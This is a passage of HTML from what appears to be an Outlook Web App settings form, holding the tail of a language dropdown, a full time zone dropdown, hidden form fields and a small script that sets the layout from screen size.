&#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="4096">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1587;&#1604;&#1591;&#1577; &#1575;&#1604;&#1601;&#1604;&#1587;&#1591;&#1610;&#1606;&#1610;&#1577;)&#x200F;</option><option value="2049">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1593;&#1585;&#1575;&#1602;)&#x200F;</option><option value="13313">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1603;&#1608;&#1610;&#1578;)&#x200F;</option><option value="1025">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1605;&#1605;&#1604;&#1603;&#1577; &#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#1575;&#1604;&#1587;&#1593;&#1608;&#1583;&#1610;&#1577;)&#x200F;</option><option value="6145">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1605;&#1605;&#1604;&#1603;&#1577; &#1575;&#1604;&#1605;&#1594;&#1585;&#1576;&#1610;&#1577;)&#x200F;</option><option value="9217">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1575;&#1604;&#1610;&#1605;&#1606;)&#x200F;</option><option value="7169">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1578;&#1608;&#1606;&#1587;)&#x200F;</option><option value="10241">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1587;&#1608;&#1585;&#1610;&#1575;)&#x200F;</option><option value="8193">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1593;&#1605;&#1575;&#1606;)&#x200F;</option><option value="16385">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1602;&#1591;&#1585;)&#x200F;</option><option value="12289">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1604;&#1576;&#1606;&#1575;&#1606;)&#x200F;</option><option value="4097">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1604;&#1610;&#1576;&#1610;&#1575;)&#x200F;</option><option value="3073">&#1575;&#1604;&#1593;&#1585;&#1576;&#1610;&#1577; &#x200F;(&#1605;&#1589;&#1585;)&#x200F;</option><option value="1164">&#1583;&#1585;&#1609; &#x200F;(&#1575;&#1601;&#1594;&#1575;&#1606;&#1587;&#1578;&#1575;&#1606;)&#x200F;</option><option value="2137">&#1587;&#1606;&#1676;&#1610; &#x200F;(&#1662;&#1575;&#1705;&#1587;&#1578;&#1575;&#1606;)&#x200F;</option><option value="1065">&#1601;&#1575;&#1585;&#1587;&#1609; &#x200F;(&#1575;&#1740;&#1585;&#1575;&#1606;)&#x200F;</option><option value="1152">&#1574;&#1735;&#1610;&#1594;&#1735;&#1585;&#1670;&#1749; &#x200F;(&#1580;&#1735;&#1709;&#1582;&#1735;&#1575; &#1582;&#1749;&#1604;&#1602; &#1580;&#1735;&#1605;&#1726;&#1735;&#1585;&#1609;&#1610;&#1609;&#1578;&#1609;)&#x200F;</option><option value="1111">&#2325;&#2379;&#2306;&#2325;&#2339;&#2368; &#x200E;(&#2349;&#2366;&#2352;&#2340;)&#x200E;</option><option value="1121">&#2344;&#2375;&#2346;&#2366;&#2354;&#2368; &#x200E;(&#2344;&#2375;&#2346;&#2366;&#2354;)&#x200E;</option><option value="2145">&#2344;&#2375;&#2346;&#2366;&#2354;&#2368; &#x200E;(&#2349;&#2366;&#2352;&#2340;)&#x200E;</option><option value="1102">&#2350;&#2352;&#2366;&#2336;&#2368; &#x200E;(&#2349;&#2366;&#2352;&#2340;)&#x200E;</option><option value="1081">&#2361;&#2367;&#2306;&#2342;&#2368; &#x200E;(&#2349;&#2366;&#2352;&#2340;)&#x200E;</option><option value="1101">&#2437;&#2488;&#2478;&#2496;&#2527;&#2494; &#x200E;(&#2477;&#2494;&#2544;&#2468;)&#x200E;</option><option value="2117">&#2476;&#2494;&#2434;&#2482;&#2494; &#x200E;(&#2476;&#2494;&#2434;&#2482;&#2494;&#2470;&#2503;&#2486;)&#x200E;</option><option value="1093">&#2476;&#2494;&#2434;&#2482;&#2494; &#x200E;(&#2477;&#2494;&#2480;&#2468;)&#x200E;</option><option value="1094">&#2602;&#2672;&#2588;&#2622;&#2604;&#2624; &#x200E;(&#2605;&#2622;&#2608;&#2596;)&#x200E;</option><option value="1095">&#2711;&#2753;&#2716;&#2736;&#2750;&#2724;&#2752; &#x200E;(&#2733;&#2750;&#2736;&#2724;)&#x200E;</option><option value="1096">&#2835;&#2908;&#2879;&#2822; &#x200E;(&#2861;&#2878;&#2864;&#2852;)&#x200E;</option><option value="1097">&#2980;&#2990;&#3007;&#2996;&#3021; &#x200E;(&#2951;&#2984;&#3021;&#2980;&#3007;&#2991;&#3006;)&#x200E;</option><option value="1098">&#3108;&#3142;&#3122;&#3137;&#3095;&#3137; &#x200E;(&#3117;&#3134;&#3120;&#3108;&#160;&#3110;&#3143;&#3126;&#3074;)&#x200E;</option><option value="1099">&#3221;&#3240;&#3277;&#3240;&#3233; &#x200E;(&#3245;&#3262;&#3248;&#3236;)&#x200E;</option><option value="1100">&#3374;&#3378;&#3375;&#3390;&#3379;&#3330; &#x200E;(&#3335;&#3368;&#3405;&#3364;&#3405;&#3375;)&#x200E;</option><option value="1115">&#3523;&#3538;&#3458;&#3524;&#3517; &#x200E;(&#3521;&#3530;&#8205;&#3515;&#3539; &#3517;&#3458;&#3482;&#3535;&#3520;)&#x200E;</option><option value="1054">&#3652;&#3607;&#3618; &#x200E;(&#3652;&#3607;&#3618;)&#x200E;</option><option value="1108">&#3749;&#3762;&#3751; &#x200E;(&#3749;&#3762;&#3751;)&#x200E;</option><option value="1107">&#6039;&#6070;&#6047;&#6070;&#6017;&#6098;&#6040;&#6082;&#6042; &#x200E;(&#6016;&#6040;&#6098;&#6038;&#6075;&#6023;&#6070;)&#x200E;</option><option value="1118">&#4768;&#4635;&#4653;&#4763; &#x200E;(&#4770;&#4725;&#4846;&#4917;&#4843;)&#x200E;</option><option value="1042">&#54620;&#44397;&#50612;&#x200E;(&#45824;&#54620;&#48124;&#44397;)&#x200E;</option><option value="2052">&#20013;&#25991;&#x200E;(&#20013;&#22269;)&#x200E;</option><option value="1028">&#20013;&#25991;&#x200E;(&#21488;&#28771;)&#x200E;</option><option value="4100">&#20013;&#25991;&#x200E;(&#26032;&#21152;&#22369;)&#x200E;</option><option value="5124">&#20013;&#25991;&#x200E;(&#28595;&#38272;&#29305;&#21029;&#34892;&#25919;&#21312;)&#x200E;</option><option value="3076">&#20013;&#25991;&#x200E;(&#39321;&#28207;&#29305;&#21029;&#34892;&#25919;&#21312;)&#x200E;</option><option value="1041">&#26085;&#26412;&#35486; &#x200E;(&#26085;&#26412;)&#x200E;</option></select></div>
		    <div class="signInInputLabel hiddenElement" aria-hidden="true">Time zone:</div>
            <div><select id=selTz name=tzid class=languageInputText onchange="isTimezoneSelectedCheck()" role="listbox"> <option selected="selected">Select time zone</option> <option value="Dateline Standard Time">&#x200E;(UTC-12:00)&#x200E; International Date Line West<option value="Samoa Standard Time">&#x200E;(UTC+13:00)&#x200E; Samoa<option value="UTC-11">&#x200E;(UTC-11:00)&#x200E; Coordinated Universal Time-11<option value="Aleutian Standard Time">&#x200E;(UTC-10:00)&#x200E; Aleutian Islands<option value="Hawaiian Standard Time">&#x200E;(UTC-10:00)&#x200E; Hawaii<option value="Marquesas Standard Time">&#x200E;(UTC-09:30)&#x200E; Marquesas Islands<option value="Alaskan Standard Time">&#x200E;(UTC-09:00)&#x200E; Alaska<option value="UTC-09">&#x200E;(UTC-09:00)&#x200E; Coordinated Universal Time-09<option value="Pacific Standard Time (Mexico)">&#x200E;(UTC-08:00)&#x200E; Baja California<option value="UTC-08">&#x200E;(UTC-08:00)&#x200E; Coordinated Universal Time-08<option value="Pacific Standard Time">&#x200E;(UTC-08:00)&#x200E; Pacific Time &#x200E;(US & Canada)&#x200E;<option value="US Mountain Standard Time">&#x200E;(UTC-07:00)&#x200E; Arizona<option value="Mountain Standard Time (Mexico)">&#x200E;(UTC-07:00)&#x200E; Chihuahua, La Paz, Mazatlan<option value="Mountain Standard Time">&#x200E;(UTC-07:00)&#x200E; Mountain Time &#x200E;(US & Canada)&#x200E;<option value="Eastern Standard Time (Mexico)">&#x200E;(UTC-05:00)&#x200E; Chetumal<option value="Central America Standard Time">&#x200E;(UTC-06:00)&#x200E; Central America<option value="Central Standard Time">&#x200E;(UTC-06:00)&#x200E; Central Time &#x200E;(US & Canada)&#x200E;<option value="Easter Island Standard Time">&#x200E;(UTC-06:00)&#x200E; Easter Island<option value="Central Standard Time (Mexico)">&#x200E;(UTC-06:00)&#x200E; Guadalajara, Mexico City, Monterrey<option value="Canada Central Standard Time">&#x200E;(UTC-06:00)&#x200E; Saskatchewan<option value="SA Pacific Standard Time">&#x200E;(UTC-05:00)&#x200E; Bogota, Lima, Quito, Rio Branco<option value="Eastern Standard Time">&#x200E;(UTC-05:00)&#x200E; Eastern Time &#x200E;(US & Canada)&#x200E;<option value="Haiti Standard Time">&#x200E;(UTC-05:00)&#x200E; Haiti<option value="Cuba Standard Time">&#x200E;(UTC-05:00)&#x200E; Havana<option value="US Eastern Standard Time">&#x200E;(UTC-05:00)&#x200E; Indiana &#x200E;(East)&#x200E;<option value="Turks And Caicos Standard Time">&#x200E;(UTC-05:00)&#x200E; Turks and Caicos<option value="Venezuela Standard Time">&#x200E;(UTC-04:00)&#x200E; Caracas<option value="Magallanes Standard Time">&#x200E;(UTC-03:00)&#x200E; Punta Arenas<option value="Paraguay Standard Time">&#x200E;(UTC-04:00)&#x200E; Asuncion<option value="Atlantic Standard Time">&#x200E;(UTC-04:00)&#x200E; Atlantic Time &#x200E;(Canada)&#x200E;<option value="Central Brazilian Standard Time">&#x200E;(UTC-04:00)&#x200E; Cuiaba<option value="SA Western Standard Time">&#x200E;(UTC-04:00)&#x200E; Georgetown, La Paz, Manaus, San Juan<option value="Pacific SA Standard Time">&#x200E;(UTC-04:00)&#x200E; Santiago<option value="Newfoundland Standard Time">&#x200E;(UTC-03:30)&#x200E; Newfoundland<option value="Tocantins Standard Time">&#x200E;(UTC-03:00)&#x200E; Araguaina<option value="E. South America Standard Time">&#x200E;(UTC-03:00)&#x200E; Brasilia<option value="SA Eastern Standard Time">&#x200E;(UTC-03:00)&#x200E; Cayenne, Fortaleza<option value="Argentina Standard Time">&#x200E;(UTC-03:00)&#x200E; City of Buenos Aires<option value="Greenland Standard Time">&#x200E;(UTC-03:00)&#x200E; Greenland<option value="Montevideo Standard Time">&#x200E;(UTC-03:00)&#x200E; Montevideo<option value="Saint Pierre Standard Time">&#x200E;(UTC-03:00)&#x200E; Saint Pierre and Miquelon<option value="Bahia Standard Time">&#x200E;(UTC-03:00)&#x200E; Salvador<option value="UTC-02">&#x200E;(UTC-02:00)&#x200E; Coordinated Universal Time-02<option value="Mid-Atlantic Standard Time">&#x200E;(UTC-02:00)&#x200E; Mid-Atlantic<option value="Azores Standard Time">&#x200E;(UTC-01:00)&#x200E; Azores<option value="Cape Verde Standard Time">&#x200E;(UTC-01:00)&#x200E; Cabo Verde Is.<option value="UTC">&#x200E;(UTC)&#x200E; Coordinated Universal Time<option value="Morocco Standard Time">&#x200E;(UTC+00:00)&#x200E; Casablanca<option value="GMT Standard Time">&#x200E;(UTC+00:00)&#x200E; Dublin, Edinburgh, Lisbon, London<option value="Greenwich Standard Time">&#x200E;(UTC+00:00)&#x200E; Monrovia, Reykjavik<option value="W. Europe Standard Time">&#x200E;(UTC+01:00)&#x200E; Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna<option value="Central Europe Standard Time">&#x200E;(UTC+01:00)&#x200E; Belgrade, Bratislava, Budapest, Ljubljana, Prague<option value="Romance Standard Time">&#x200E;(UTC+01:00)&#x200E; Brussels, Copenhagen, Madrid, Paris<option value="Central European Standard Time">&#x200E;(UTC+01:00)&#x200E; Sarajevo, Skopje, Warsaw, Zagreb<option value="W. Central Africa Standard Time">&#x200E;(UTC+01:00)&#x200E; West Central Africa<option value="Libya Standard Time">&#x200E;(UTC+02:00)&#x200E; Tripoli<option value="Namibia Standard Time">&#x200E;(UTC+02:00)&#x200E; Windhoek<option value="Jordan Standard Time">&#x200E;(UTC+02:00)&#x200E; Amman<option value="GTB Standard Time">&#x200E;(UTC+02:00)&#x200E; Athens, Bucharest<option value="Middle East Standard Time">&#x200E;(UTC+02:00)&#x200E; Beirut<option value="Egypt Standard Time">&#x200E;(UTC+02:00)&#x200E; Cairo<option value="E. Europe Standard Time">&#x200E;(UTC+02:00)&#x200E; Chisinau<option value="Syria Standard Time">&#x200E;(UTC+02:00)&#x200E; Damascus<option value="West Bank Standard Time">&#x200E;(UTC+02:00)&#x200E; Gaza, Hebron<option value="South Africa Standard Time">&#x200E;(UTC+02:00)&#x200E; Harare, Pretoria<option value="FLE Standard Time">&#x200E;(UTC+02:00)&#x200E; Helsinki, Kyiv, Riga, Sofia, Tallinn, Vilnius<option value="Israel Standard Time">&#x200E;(UTC+02:00)&#x200E; Jerusalem<option value="Kaliningrad Standard Time">&#x200E;(UTC+02:00)&#x200E; Kaliningrad<option value="Sudan Standard Time">&#x200E;(UTC+02:00)&#x200E; Khartoum<option value="Turkey Standard Time">&#x200E;(UTC+03:00)&#x200E; Istanbul<option value="Belarus Standard Time">&#x200E;(UTC+03:00)&#x200E; Minsk<option value="Arabic Standard Time">&#x200E;(UTC+03:00)&#x200E; Baghdad<option value="Arab Standard Time">&#x200E;(UTC+03:00)&#x200E; Kuwait, Riyadh<option value="Russian Standard Time">&#x200E;(UTC+03:00)&#x200E; Moscow, St. Petersburg, Volgograd<option value="E. Africa Standard Time">&#x200E;(UTC+03:00)&#x200E; Nairobi<option value="Astrakhan Standard Time">&#x200E;(UTC+04:00)&#x200E; Astrakhan, Ulyanovsk<option value="Russia Time Zone 3">&#x200E;(UTC+04:00)&#x200E; Izhevsk, Samara<option value="Saratov Standard Time">&#x200E;(UTC+04:00)&#x200E; Saratov<option value="Iran Standard Time">&#x200E;(UTC+03:30)&#x200E; Tehran<option value="Arabian Standard Time">&#x200E;(UTC+04:00)&#x200E; Abu Dhabi, Muscat<option value="Azerbaijan Standard Time">&#x200E;(UTC+04:00)&#x200E; Baku<option value="Mauritius Standard Time">&#x200E;(UTC+04:00)&#x200E; Port Louis<option value="Georgian Standard Time">&#x200E;(UTC+04:00)&#x200E; Tbilisi<option value="Caucasus Standard Time">&#x200E;(UTC+04:00)&#x200E; Yerevan<option value="Afghanistan Standard Time">&#x200E;(UTC+04:30)&#x200E; Kabul<option value="West Asia Standard Time">&#x200E;(UTC+05:00)&#x200E; Ashgabat, Tashkent<option value="Ekaterinburg Standard Time">&#x200E;(UTC+05:00)&#x200E; Ekaterinburg<option value="Pakistan Standard Time">&#x200E;(UTC+05:00)&#x200E; Islamabad, Karachi<option value="India Standard Time">&#x200E;(UTC+05:30)&#x200E; Chennai, Kolkata, Mumbai, New Delhi<option value="Sri Lanka Standard Time">&#x200E;(UTC+05:30)&#x200E; Sri Jayawardenepura<option value="Nepal Standard Time">&#x200E;(UTC+05:45)&#x200E; Kathmandu<option value="Central Asia Standard Time">&#x200E;(UTC+06:00)&#x200E; Astana<option value="Bangladesh Standard Time">&#x200E;(UTC+06:00)&#x200E; Dhaka<option value="Omsk Standard Time">&#x200E;(UTC+06:00)&#x200E; Omsk<option value="Altai Standard Time">&#x200E;(UTC+07:00)&#x200E; Barnaul, Gorno-Altaysk<option value="N. Central Asia Standard Time">&#x200E;(UTC+07:00)&#x200E; Novosibirsk<option value="Tomsk Standard Time">&#x200E;(UTC+07:00)&#x200E; Tomsk<option value="Myanmar Standard Time">&#x200E;(UTC+06:30)&#x200E; Yangon &#x200E;(Rangoon)&#x200E;<option value="SE Asia Standard Time">&#x200E;(UTC+07:00)&#x200E; Bangkok, Hanoi, Jakarta<option value="W. Mongolia Standard Time">&#x200E;(UTC+07:00)&#x200E; Hovd<option value="North Asia Standard Time">&#x200E;(UTC+07:00)&#x200E; Krasnoyarsk<option value="China Standard Time">&#x200E;(UTC+08:00)&#x200E; Beijing, Chongqing, Hong Kong, Urumqi<option value="North Asia East Standard Time">&#x200E;(UTC+08:00)&#x200E; Irkutsk<option value="Singapore Standard Time">&#x200E;(UTC+08:00)&#x200E; Kuala Lumpur, Singapore<option value="W. Australia Standard Time">&#x200E;(UTC+08:00)&#x200E; Perth<option value="Taipei Standard Time">&#x200E;(UTC+08:00)&#x200E; Taipei<option value="Ulaanbaatar Standard Time">&#x200E;(UTC+08:00)&#x200E; Ulaanbaatar<option value="Transbaikal Standard Time">&#x200E;(UTC+09:00)&#x200E; Chita<option value="North Korea Standard Time">&#x200E;(UTC+08:30)&#x200E; Pyongyang<option value="Aus Central W. Standard Time">&#x200E;(UTC+08:45)&#x200E; Eucla<option value="Tokyo Standard Time">&#x200E;(UTC+09:00)&#x200E; Osaka, Sapporo, Tokyo<option value="Korea Standard Time">&#x200E;(UTC+09:00)&#x200E; Seoul<option value="Yakutsk Standard Time">&#x200E;(UTC+09:00)&#x200E; Yakutsk<option value="Cen. Australia Standard Time">&#x200E;(UTC+09:30)&#x200E; Adelaide<option value="AUS Central Standard Time">&#x200E;(UTC+09:30)&#x200E; Darwin<option value="E. Australia Standard Time">&#x200E;(UTC+10:00)&#x200E; Brisbane<option value="AUS Eastern Standard Time">&#x200E;(UTC+10:00)&#x200E; Canberra, Melbourne, Sydney<option value="West Pacific Standard Time">&#x200E;(UTC+10:00)&#x200E; Guam, Port Moresby<option value="Tasmania Standard Time">&#x200E;(UTC+10:00)&#x200E; Hobart<option value="Vladivostok Standard Time">&#x200E;(UTC+10:00)&#x200E; Vladivostok<option value="Bougainville Standard Time">&#x200E;(UTC+11:00)&#x200E; Bougainville Island<option value="Magadan Standard Time">&#x200E;(UTC+11:00)&#x200E; Magadan<option value="Sakhalin Standard Time">&#x200E;(UTC+11:00)&#x200E; Sakhalin<option value="Lord Howe Standard Time">&#x200E;(UTC+10:30)&#x200E; Lord Howe Island<option value="Russia Time Zone 10">&#x200E;(UTC+11:00)&#x200E; Chokurdakh<option value="Norfolk Standard Time">&#x200E;(UTC+11:00)&#x200E; Norfolk Island<option value="Central Pacific Standard Time">&#x200E;(UTC+11:00)&#x200E; Solomon Is., New Caledonia<option value="Russia Time Zone 11">&#x200E;(UTC+12:00)&#x200E; Anadyr, Petropavlovsk-Kamchatsky<option value="New Zealand Standard Time">&#x200E;(UTC+12:00)&#x200E; Auckland, Wellington<option value="UTC+12">&#x200E;(UTC+12:00)&#x200E; Coordinated Universal Time+12<option value="Fiji Standard Time">&#x200E;(UTC+12:00)&#x200E; Fiji<option value="Kamchatka Standard Time">&#x200E;(UTC+12:00)&#x200E; Petropavlovsk-Kamchatsky - Old<option value="Chatham Islands Standard Time">&#x200E;(UTC+12:45)&#x200E; Chatham Islands<option value="UTC+13">&#x200E;(UTC+13:00)&#x200E; Coordinated Universal Time+13<option value="Tonga Standard Time">&#x200E;(UTC+13:00)&#x200E; Nuku'alofa<option value="Line Islands Standard Time">&#x200E;(UTC+14:00)&#x200E; Kiritimati Island</select></div>
            <div><br/><label class="timezoneSelectionMessageLabel hiddenElement" aria-hidden="true" id='timezoneSelectionMessage' style='display:none'>Please select your time zone.</label></div> 
		    
            <div class="signInEnter"><div onclick="frmSbmt()" onkeypress="handleEnterPress(event)" style="cursor:pointer;display:inline" aria-hidden="true" class="hiddenElement" role="button" tabindex="0"><img src="https://outlook.office365.com/owa/1x1.gif" class="imgLnk arrow" alt=""><span class="signinTxt">Save</span></div>
		    <input name="saveLanguageAndTimezone" value="1" type="hidden"/>
            <input name="X-OWA-CANARY" type="hidden"/>
		    </div>
            <div class="hidden-submit" aria-hidden="true"><input type="submit" tabindex="-1"/></div>
            </div>
        </div>
        <script>
            var mainLogonDiv = window.document.getElementById("mainLogonDiv");
            var isAndroid = window.navigator.userAgent.indexOf("Android") != -1;
            var screenWidth = isAndroid ? window.document.body.clientWidth : window.screen.width;
            var screenheight = isAndroid ? window.document.body.clientHeight : window.screen.height;

            if (!("ontouchstart" in document)) {
                mainLogonDiv.className = "mouse";
            }
            else if (screenWidth <= 600 || screenheight <= 600) {
                mainLogonDiv.className = "tnarrow";
            }
            else {
                mainLogonDiv.className = "twide";
            }
    </script> 
</div>
</form>
</body>
</html>
